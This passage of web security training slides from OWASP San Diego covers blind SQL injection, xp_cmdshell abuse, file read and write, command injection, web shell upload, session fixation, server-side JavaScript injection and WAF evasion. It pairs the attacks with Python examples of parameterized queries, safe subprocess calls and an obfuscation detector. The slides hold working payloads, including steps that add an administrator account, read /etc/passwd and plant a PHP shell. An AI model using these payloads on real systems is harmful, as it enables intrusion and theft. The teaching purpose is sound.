Page 91: OWASP San Diego Training Presentation

The logical AND technique takes roughly the same number of requests on average as the binary search technique. However, with the logical AND technique each request is independent of the previous one (a binary search needs the previous answer to pick the next bound), so multiple requests can be made at the same time.

Blind SQL Injection

Page 92: OWASP San Diego Training Presentation

Inference response based blind SQL Injection

True or False based on the sites response or response data

http://victim.com/search.aspx?id=1' and 1=1 --(no 500)http://victim.com/search.aspx?id=1' and 1=1/0 --(500)

Blind SQL Injection

Page 93: OWASP San Diego Training Presentation

Oracle timing-based SQL injection:
(select 'a'||Utl_Http.request('http://madeupserver.com') from dual WHERE (SELECT username FROM all_users WHERE username='DBSNMP') = 'DBSNMP') --

Blind SQL Injection

Page 94: OWASP San Diego Training Presentation

Heavy Queries

http://victim.com/search.aspx?id=1' and (light query) and (heavy query)

Blind SQL Injection

Page 95: OWASP San Diego Training Presentation

Demo

Page 96: OWASP San Diego Training Presentation

Execute commands in MSSQL by using xp_cmdshell

' exec sp_configure 'show advanced options',1 --
' ; RECONFIGURE --
' exec sp_configure 'xp_cmdshell',1 --
' ; RECONFIGURE --
' exec master..xp_cmdshell 'net user pwny pwnsauce /ADD' --
' exec master..xp_cmdshell 'net localgroup Administrators pwny /ADD' --

Metasploit and Core Impact both have modules for this that can speed up exploitation and pivoting on a system

SQL Injection Operating System

Page 97: OWASP San Diego Training Presentation

MySQL read file from filesystem ◦ select LOAD_FILE('/etc/passwd')

MySQL write file to filesystem◦ select 'this is a test' into outfile '/var/www/test.txt'

SQL Injection Operating System

Page 98: OWASP San Diego Training Presentation

Parameterized Queries or Prepared Statements

Don't put user input into an ORDER BY clause. ORDER BY is not usually supported by parameterized queries
◦ ASC and DESC are the only two options: use an if statement, or sort the output in JavaScript
◦ You can grab the valid table/column names or values with a query, check that the user input matches one of them, and only then concatenate the result of that query

SQL Injection Defense
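The authentication bypass from page 63 and this slide's defences side by side, as an added example that is not part of the original deck. It uses sqlite3 so it runs offline; the users table and its rows are constructed. login_vulnerable builds the query by string formatting, so admin' or 1=1 -- comments out the password check and returns every user. login_parameterized binds the same input as a value and returns nothing. list_users shows the ORDER BY case: the sort column is looked up in an allowlist and the direction is reduced to one of two constants, so no user input is ever concatenated.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed in-memory database for the example (passwords would be hashed in real code)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, created TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "s3cret", "2014-01-01"), ("bob", "hunter2", "2014-03-05")],
    )
    return conn

def login_vulnerable(conn, username: str, password: str) -> list:
    # Page 63: input is spliced into the statement, so the quote and -- rewrite it.
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return [row[0] for row in conn.execute(sql)]

def login_parameterized(conn, username: str, password: str) -> list:
    # Placeholders: the driver sends the values separately, they can never become SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]

SORTABLE_COLUMNS = {"username": "username", "created": "created"}   # allowlist

def sort_key_accepted(sort_by: str) -> bool:
    return sort_by in SORTABLE_COLUMNS

def list_users(conn, sort_by: str, direction: str = "asc") -> list:
    # ORDER BY cannot be parameterized, so map the input onto known constants instead.
    if not sort_key_accepted(sort_by):
        raise ValueError(f"unknown sort column: {sort_by!r}")
    column = SORTABLE_COLUMNS[sort_by]
    order = "DESC" if direction.lower() == "desc" else "ASC"
    sql = f"SELECT username FROM users ORDER BY {column} {order}"
    return [row[0] for row in conn.execute(sql)]
```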

Page 100: OWASP San Diego Training Presentation

Commands
◦ google.com; ping -c 20 localhost
◦ google.com & ping -c 20 localhost
◦ google.com && ping -c 20 localhost
◦ google.com && ping -n 20 localhost
◦ google.com && ping -c 20 localhost #
◦ google.com && echo '<?php …system(…)..' > /var/www/site/cmd.php

Command Injection
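The injection above next to the fix, as an added example that is not from the original deck. It assumes a POSIX shell and an echo binary, and uses echo in place of ping so it runs without a network. lookup_vulnerable concatenates the host into a shell command string, which is exactly the pattern the payloads on the slide exploit; lookup_safe validates the host against a strict pattern (which also rejects a leading '-' so the value cannot become an option) and passes it as one argv element with no shell at all.

```python
import re
import subprocess

# Letters, digits, dots and dashes only, no leading '-' (it would be parsed as an option).
HOST_RE = re.compile(r"^(?!-)[A-Za-z0-9.-]{1,253}$")

def valid_host(host: str) -> bool:
    return bool(HOST_RE.match(host))

def lookup_vulnerable(host: str) -> str:
    # The slide's pattern: user input concatenated into a command string run by a shell,
    # so ';', '&', '&&', '|' and '#' in the input are interpreted by the shell.
    cmd = "echo resolving " + host            # stands in for "ping -c 1 " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def lookup_safe(host: str) -> str:
    if not valid_host(host):
        raise ValueError(f"rejected host: {host!r}")
    # argv list and shell=False: the host is one argument, never parsed as shell syntax.
    return subprocess.run(["echo", "resolving", host], capture_output=True, text=True).stdout
```

Validation and the argv list are both needed: the list stops shell metacharacters, the pattern stops argument injection such as a host of -c or an overlong value.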

Page 101: OWASP San Diego Training Presentation

https://172.17.0.42/dvwa/ Command Execution

EXERCISE – Command Injection

Page 102: OWASP San Diego Training Presentation

Upload a dynamic file (ie. php, asp, aspx, jsp, etc..)

Run the dynamic code by going to the file using a web browser◦ http://victim.com/uploads/shell.php

Arbitrary File Upload

Page 103: OWASP San Diego Training Presentation

https://172.17.0.42/dvwa/ → Upload Use: https://172.17.0.144/downloads/

EXERCISE – Arbitrary File Upload

Page 104: OWASP San Diego Training Presentation

Cookie: admin=false Cookie: 139434 Cookie: logged_in=false

Burp Sequencer can be used to identify non random cookie variables

Session Manipulation and Session Hijacking

Page 105: OWASP San Diego Training Presentation

Padding Oracle Attack (POET tool)

Session Manipulation and Session Hijacking

Page 106: OWASP San Diego Training Presentation

http://victim.com/login.php?SESSID=4v0rmq4gosaag63rla631gl5m2

http://victim.com/login.php?SESSID=aaaaaaaaaaaaaaaaaaaaaaaaaa

Send the link to someone else so their cookie is set automatically. Let them log in, then take over their session.

Session Fixation

Page 107: OWASP San Diego Training Presentation

Node.js Mongodb (NoSQL with javascript engine) CouchDB (NoSQL with javascript engine)

Javascript Server Side Injection

Page 108: OWASP San Diego Training Presentation

POST /test/ HTTP/1.1
Host: 192.168.1.123
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

response.end('pwnd');

Javascript Server Side Injection

Page 109: OWASP San Diego Training Presentation

response.end('<script>alert(1)</script>');

var fs = require('fs'); response.end(fs.readdirSync('c:\\').toString());

var fs = require('fs'); response.end(fs.writeFileSync('c:\\secret.txt','littleSecret'));

require('child_process').spawn('c:\\windows\\system32\\calc.exe');

response.end('success');

Javascript Server Side Injection

Page 110: OWASP San Diego Training Presentation

NoSQL databases typically store data as key/value pairs or documents rather than relational tables

NoSQL databases are not very strict about what data you can insert

NoSQL database implementations may or may not implement standard SQL

NoSQL Injection

Page 111: OWASP San Diego Training Presentation

Try characters one by one in the GET or POST to see if specific characters are blocked

WAFs very often drop your traffic (Burp will usually time out and your browser will show an error)

Instead of
◦ or '1'='1'--

Try
◦ Or/**/'2'/**/LiKe/**/'2

Instead of
◦ waitfor delay '0:0:20'--

Try
◦ Wait+for+dElay+'0:0:20'--

Defeating IDS/IPS/WAF

Page 112: OWASP San Diego Training Presentation

Instead of
◦ admin

Try
◦ char(0x61)%2bchar(0x64)%2bchar(0x6D)%2bchar(0x69)%2bchar(0x6E)

Instead of
◦ ' union select password from users --%20

Try
◦ '(union(select(password)from(users))--((1))

Defeating IDS/IPS/WAF

Page 113: OWASP San Diego Training Presentation

Change GET to POST or POST to GET or Use HEAD

Use IPv6 Change IPv4 version header to 5 (IPv5) HTTP Parameter Pollution

◦ http://victim.com/admin.php?userid=1&userid=2⚫ASP concatenates: 1,2⚫PHP takes last occurrence⚫ Java takes first occurrence

Change Content Type◦ Content-Type: multipart/; boundry=0000

⚫ (evasion of ModSecurity CRS)

Defeating IDS/IPS/WAF

Page 114: OWASP San Diego Training Presentation

There are many ways in a database to do the same thing
◦ @@version
◦ version()
◦ select banner from v$version where banner like 'Oracle%'
◦ select version from v$instance

Defeating IDS/IPS/WAF

Page 115: OWASP San Diego Training Presentation

Non-alphanumeric XSS
◦ eval("aler"+(!![]+[])[+[]])("xss")
◦ window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]

Defeating IDS/IPS/WAF

Page 116: OWASP San Diego Training Presentation


Defeating IDS/IPS/WAF
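The slide's payload is written in the JSFuck style, where every JavaScript token is rebuilt from the characters `[]()!+{}`, so a WAF signature looking for keywords such as `alert(` never matches. As an added example (not from the original slides), the detector below flags request parameters by the shape of the input instead of by keyword; the parameter names, sample values, length floor and ratio threshold are all constructed assumptions.

```python
import re

# JSFuck-style JavaScript is assembled almost entirely from these characters;
# the few remaining characters are usually short string literals.
JSFUCK_ALPHABET = set("[]()!+{}")


def jsfuck_ratio(text: str) -> float:
    """Fraction of non-whitespace characters drawn from the JSFuck alphabet."""
    body = re.sub(r"\s+", "", text)
    if not body:
        return 0.0
    hits = sum(1 for ch in body if ch in JSFUCK_ALPHABET)
    return hits / len(body)


def looks_obfuscated(text: str, min_len: int = 40, threshold: float = 0.9) -> bool:
    """Heuristic: long enough and overwhelmingly made of the JSFuck alphabet.

    Short legitimate fragments such as "!![]" stay below min_len, and ordinary
    text with a few brackets stays below the ratio, so neither is flagged.
    Thresholds are assumptions to tune against your own traffic.
    """
    body = re.sub(r"\s+", "", text)
    return len(body) >= min_len and jsfuck_ratio(text) >= threshold


def scan_params(params: dict) -> list:
    """Return the names of request parameters whose values look obfuscated."""
    return [name for name, value in params.items() if looks_obfuscated(value)]


# Constructed sample parameters, not a real capture. "q" carries a short
# fragment in the slide's alphabet; the others are ordinary user input.
SAMPLE_PARAMS = {
    "name": "Bob",
    "comment": "hello [world] (test) !!",
    "q": "[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]",
}

if __name__ == "__main__":
    print("flagged parameters:", scan_params(SAMPLE_PARAMS))
```

A ratio check like this belongs alongside, not instead of, keyword signatures: it catches the alphabet-restricted encodings a signature misses, while the signature still covers plain payloads.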

Page 117: OWASP San Diego Training Presentation

Questions?